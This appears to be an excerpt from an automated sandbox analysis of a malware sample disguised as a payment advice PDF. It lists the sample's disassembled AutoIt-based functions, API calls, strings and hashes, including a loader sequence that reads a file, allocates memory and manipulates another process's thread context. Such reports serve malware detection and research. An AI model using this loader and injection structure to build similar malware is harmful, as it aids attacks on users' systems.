                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                              • API String ID: 1825951767-3513169116
                                                              • Opcode ID: cd52b2133ad5c28fe8ad2e1d6b4e486f56e69ecd52d2e73e261e08fb5d3d0785
                                                              • Instruction ID: 07da9b3150e4c123d43b1b8fa81d27c10823ff4a1c04d4d2f127f42b9fe20519
                                                              • Opcode Fuzzy Hash: cd52b2133ad5c28fe8ad2e1d6b4e486f56e69ecd52d2e73e261e08fb5d3d0785
                                                              • Instruction Fuzzy Hash: 14A13B7191062D9ADF14EBA8DC95EEEBB79FF14310F400429E416E7192EF749A08CB62
                                                              Function 01655560 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 942 1655560-165560e call 1652f60 945 1655615-165563b call 1656470 CreateFileW 942->945 948 1655642-1655652 945->948 949 165563d 945->949 954 1655654 948->954 955 1655659-1655673 VirtualAlloc 948->955 950 165578d-1655791 949->950 952 16557d3-16557d6 950->952 953 1655793-1655797 950->953 956 16557d9-16557e0 952->956 957 16557a3-16557a7 953->957 958 1655799-165579c 953->958 954->950 959 1655675 955->959 960 165567a-1655691 ReadFile 955->960 961 1655835-165584a 956->961 962 16557e2-16557ed 956->962 963 16557b7-16557bb 957->963 964 16557a9-16557b3 957->964 958->957 959->950 969 1655693 960->969 970 1655698-16556d8 VirtualAlloc 960->970 965 165584c-1655857 VirtualFree 961->965 966 165585a-1655862 961->966 971 16557f1-16557fd 962->971 972 16557ef 962->972 967 16557bd-16557c7 963->967 968 16557cb 963->968 964->963 965->966 967->968 968->952 969->950 973 16556df-16556fa call 16566c0 970->973 974 16556da 970->974 975 1655811-165581d 971->975 976 16557ff-165580f 971->976 972->961 982 1655705-165570f 973->982 974->950 979 165581f-1655828 975->979 980 165582a-1655830 975->980 978 1655833 976->978 978->956 979->978 980->978 983 1655711-1655740 call 16566c0 982->983 984 1655742-1655756 call 16564d0 982->984 983->982 990 1655758 984->990 991 165575a-165575e 984->991 990->950 992 1655760-1655764 CloseHandle 991->992 993 165576a-165576e 991->993 992->993 994 1655770-165577b VirtualFree 993->994 995 165577e-1655787 993->995 994->995 995->945 995->950
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01655631
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01655857
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                              • Instruction ID: 7bd805eaa2988b40a040329e68891ca2960597837a011c309c0cd801f92d2298
                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                              • Instruction Fuzzy Hash: F8A12A74E00219EBDB54CFA4C898BEEBBB5FF48304F208159E902BB280D7759A41CF65
                                                              Function 008439D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1073 8439d5-843a45 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00843A03
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843A24
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00843A38
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00843A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: df04147a9c2cf0ee41da64eeb9316fff090db98d5988c30870b37d328f7254e7
                                                              • Instruction ID: e16166f902b1898b422be47289ff57100f0794ce92bca885c39aafd9fe890ad2
                                                              • Opcode Fuzzy Hash: df04147a9c2cf0ee41da64eeb9316fff090db98d5988c30870b37d328f7254e7
                                                              • Instruction Fuzzy Hash: DAF03A70514294BFEA30672B6C0CF2B3E7EEBC6F50F02402EBA14A2171C2710850EEB0
                                                              Function 01655310 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1074 1655310-165545e call 1652f60 call 1655200 CreateFileW 1081 1655465-1655475 1074->1081 1082 1655460 1074->1082 1085 1655477 1081->1085 1086 165547c-1655496 VirtualAlloc 1081->1086 1083 1655515-165551a 1082->1083 1085->1083 1087 1655498 1086->1087 1088 165549a-16554b1 ReadFile 1086->1088 1087->1083 1089 16554b5-16554ef call 1655240 call 1654200 1088->1089 1090 16554b3 1088->1090 1095 16554f1-1655506 call 1655290 1089->1095 1096 165550b-1655513 ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                              APIs
                                                                • Part of subcall function 01655200: Sleep.KERNELBASE(000001F4), ref: 01655211
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01655454
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: AGRRZD35N3OTKJFGEU0XAS73LVK
                                                              • API String ID: 2694422964-2491944136
                                                              • Opcode ID: 4c6b8a5609d8e190fe69abf6f216281f308f2dce88423cbf2571ba08131781f9
                                                              • Instruction ID: c4d585c62a2d22a4cb78d87c515377ddfa3f81644be775e6cfbbe738049e45cf
                                                              • Opcode Fuzzy Hash: 4c6b8a5609d8e190fe69abf6f216281f308f2dce88423cbf2571ba08131781f9
                                                              • Instruction Fuzzy Hash: 9D619070D04288DAEF11DBB8C858BDEBBB59F15304F044198E649BB2C1D7B91B49CBA6
                                                              Function 0084407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1098 84407c-844092 1099 84416f-844173 1098->1099 1100 844098-8440ad call 847a16 1098->1100 1103 8440b3-8440d3 call 847bcc 1100->1103 1104 87d3c8-87d3d7 LoadStringW 1100->1104 1107 87d3e2-87d3fa call 847b2e call 846fe3 1103->1107 1108 8440d9-8440dd 1103->1108 1104->1107 1117 8440ed-84416a call 862de0 call 84454e call 862dbc Shell_NotifyIconW call 845904 1107->1117 1120 87d400-87d41e call 847cab call 846fe3 call 847cab 1107->1120 1110 844174-84417d call 848047 1108->1110 1111 8440e3-8440e8 call 847b2e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                              APIs
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0087D3D7
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • _memset.LIBCMT ref: 008440FC
                                                              • _wcscpy.LIBCMT ref: 00844150
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00844160
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 3942752672-1585850449
                                                              • Opcode ID: c26eb76cc201f01ac5a8aa2b72661d5def7b7bf070853f13e98441d934b6cd3d
                                                              • Instruction ID: 8d2cb23a77722e98aacd59cd799d0da6f574d03cbcef0276154d82660e1d9c9f
                                                              • Opcode Fuzzy Hash: c26eb76cc201f01ac5a8aa2b72661d5def7b7bf070853f13e98441d934b6cd3d
                                                              • Instruction Fuzzy Hash: D931AE71008708AFD721EB68DC46FEB77E8FF44314F20451AB699D20A1EB749658CB93
                                                              Function 0084686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1133 84686a-846891 call 844ddd 1136 846897-8468a5 call 844ddd 1133->1136 1137 87e031-87e041 call 8a955b 1133->1137 1136->1137 1142 8468ab-8468b1 1136->1142 1141 87e046-87e048 1137->1141 1143 87e067-87e0af call 860db6 1141->1143 1144 87e04a-87e04d call 844e4a 1141->1144 1145 8468b7-8468d9 call 846a8c 1142->1145 1146 87e052-87e061 call 8a42f8 1142->1146 1152 87e0d4 1143->1152 1153 87e0b1-87e0bb 1143->1153 1144->1146 1146->1143 1157 87e0d6-87e0e9 1152->1157 1156 87e0cf-87e0d0 1153->1156 1158 87e0d2 1156->1158 1159 87e0bd-87e0cc 1156->1159 1160 87e260-87e263 call 862d55 1157->1160 1161 87e0ef 1157->1161 1158->1157 1159->1156 1164 87e268-87e271 call 844e4a 1160->1164 1163 87e0f6-87e0f9 call 847480 1161->1163 1167 87e0fe-87e120 call 845db2 call 8a73e9 1163->1167 1170 87e273-87e283 call 847616 call 845d9b 1164->1170 1177 87e134-87e13e call 8a73d3 1167->1177 1178 87e122-87e12f 1167->1178 1186 87e288-87e2b8 call 89f7a1 call 860e2c call 862d55 call 844e4a 1170->1186 1184 87e140-87e153 1177->1184 1185 87e158-87e162 call 8a73bd 1177->1185 1179 87e227-87e237 call 84750f 1178->1179 1179->1167 1190 87e23d-87e25a call 84735d 1179->1190 1184->1179 1196 87e176-87e180 call 845e2a 1185->1196 1197 87e164-87e171 1185->1197 1186->1170 1190->1160 1190->1163 1196->1179 1203 87e186-87e19e call 89f73d 1196->1203 1197->1179 1208 87e1c1-87e1c4 1203->1208 1209 87e1a0-87e1bf call 847de1 call 845904 1203->1209 1210 87e1c6-87e1e1 call 847de1 call 846839 call 845904 1208->1210 1211 87e1f2-87e1f5 1208->1211 1232 87e1e2-87e1f0 call 845db2 1209->1232 1210->1232 1214 87e1f7-87e200 call 89f65e 1211->1214 1215 87e215-87e218 call 8a737f 1211->1215 1214->1186 1225 87e206-87e210 call 860e2c 1214->1225 1222 87e21d-87e226 call 860e2c 1215->1222 1222->1179 1225->1167 1232->1222
                                                              APIs
                                                                • Part of subcall function 00844DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E0F
                                                              • _free.LIBCMT ref: 0087E263
                                                              • _free.LIBCMT ref: 0087E2AA
                                                                • Part of subcall function 00846A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00846BAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 2861923089-1757145024
                                                              • Opcode ID: 10b8bc42f9c729f8b8f237bc65e856c19295fbd304f4bd754d632c91b6c8ddf8
                                                              • Instruction ID: d18190800ef837ba4bae1d26882f13ded5e7ca13113f60013cd56a3953a471da
                                                              • Opcode Fuzzy Hash: 10b8bc42f9c729f8b8f237bc65e856c19295fbd304f4bd754d632c91b6c8ddf8
                                                              • Instruction Fuzzy Hash: FD915B7191021DAFCF04EFA8C8819EDB7B8FF19314B14846AF819EB2A2DB709915CB51
                                                              Function 008435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008435A1,SwapMouseButtons,00000004,?), ref: 008435D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008435A1,SwapMouseButtons,00000004,?,?,?,?,00842754), ref: 008435F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,008435A1,SwapMouseButtons,00000004,?,?,?,?,00842754), ref: 00843617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 8b9a53f8c271772c9c3490c56d3a2e61b3149951ccf8b53abaff37c40d9cbc44
                                                              • Instruction ID: d13593dd9c52d3e4bd4f7127de4d6004eca4809fce1e42270cfba1c1a98c6b34
                                                              • Opcode Fuzzy Hash: 8b9a53f8c271772c9c3490c56d3a2e61b3149951ccf8b53abaff37c40d9cbc44
                                                              • Instruction Fuzzy Hash: 2911487151020DBFEB219FA4DC40DAEB7B9FF14740F128469F905E7210D2719E40A760
                                                              Function 01654200 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 016549BB
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01654A51
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01654A73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                              • Instruction ID: d5c0ad5488ca99b4f9b5327446ebdd40ad1c8b5e789632e481e2dc612788a926
                                                              • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                              • Instruction Fuzzy Hash: 4D620B30A142589BEB64CFA4CC50BDEB772EF58300F1091A9D50DEB394EB799E81CB59
                                                              Function 008A955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844EE5: _fseek.LIBCMT ref: 00844EFD
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9824
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9837
                                                              • _free.LIBCMT ref: 008A96A2
                                                              • _free.LIBCMT ref: 008A96A9
                                                              • _free.LIBCMT ref: 008A9714
                                                                • Part of subcall function 00862D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00869A24), ref: 00862D69
                                                                • Part of subcall function 00862D55: GetLastError.KERNEL32(00000000,?,00869A24), ref: 00862D7B
                                                              • _free.LIBCMT ref: 008A971C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction ID: 2ab2f689797c572244a4e4562a145ad226acf9b2207a67c0ed09499a1d80dba2
                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction Fuzzy Hash: 95514CB1D14218ABDF259F68CC81A9EBBB9FF49300F1044AEF249E3241DB715A80CF59
                                                              Function 0086470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction ID: 9fce285a45aa91ff87f4d732651d8ef4007060f19dc4ca2a65d77a6c6ca183cd
                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction Fuzzy Hash: 5541D475B0074EDBDB19DEA9C8809AE7BA6FF42364B26D53DE815C7640DB70DD408B40
                                                              Function 008444A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008444CF
                                                                • Part of subcall function 0084407C: _memset.LIBCMT ref: 008440FC
                                                                • Part of subcall function 0084407C: _wcscpy.LIBCMT ref: 00844150
                                                                • Part of subcall function 0084407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00844160
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00844524
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00844533
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0087D4B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: b3ace59dce47c8f0cedf54e9ce5aab57992adf2c9cb1634b32513cd5d8c8c561
                                                              • Instruction ID: b05d9f0c12cf55fe9ea89600ecdbf9abe6bf28e1bc602c2a333091f56db4fb8e
                                                              • Opcode Fuzzy Hash: b3ace59dce47c8f0cedf54e9ce5aab57992adf2c9cb1634b32513cd5d8c8c561
                                                              • Instruction Fuzzy Hash: BD21D070904788AFEB328B24D845BE6BBFCFF01318F04409EE79E96182C3746A84DB45
                                                              Function 00847285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0087EA39
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0087EA83
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 00860791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 93a3099a83351d5b3841daf882e5cb79d295dbdc4e724199ba64b62c5c0167ee
                                                              • Instruction ID: 116155b6357de1143852dde759f36ec4b2986e941c585e58e12a18412e5f1337
                                                              • Opcode Fuzzy Hash: 93a3099a83351d5b3841daf882e5cb79d295dbdc4e724199ba64b62c5c0167ee
                                                              • Instruction Fuzzy Hash: C021A131A1025C9BCF419FD8D845BEEBBF8FF49714F008059E508E7241DBB459898FA2
                                                              Function 008A98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 008A98F8
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008A990F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 03ec59d4ad4291f9ea8a7456d4eddec21054e4d18ced728f710dc4a73371b63e
                                                              • Instruction ID: db23eb14d689b19d5c10f46c16977df456b89cf684b8e9d2b75233540e320fff
                                                              • Opcode Fuzzy Hash: 03ec59d4ad4291f9ea8a7456d4eddec21054e4d18ced728f710dc4a73371b63e
                                                              • Instruction Fuzzy Hash: 86D05B7554030DABDB509BA0DC0DF9A773CF704700F0002B1BB54D1191D97055548B91
                                                              Function 008BCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3a8cff0e410a79fd5ce9c3b72518a71df4f0818bb48ed77871aecb8db348599
                                                              • Instruction ID: a3fb8f4e453a0514d5d944bb3de5d9655b6b16be603480a274cdc7a421cb0883
                                                              • Opcode Fuzzy Hash: a3a8cff0e410a79fd5ce9c3b72518a71df4f0818bb48ed77871aecb8db348599
                                                              • Instruction Fuzzy Hash: 05F103756083059FCB14DF28C480A6ABBE5FB89314F14896EF899DB352DB70E945CF82
                                                              Function 0084F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00860193
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0086019B
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008601A6
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008601B1
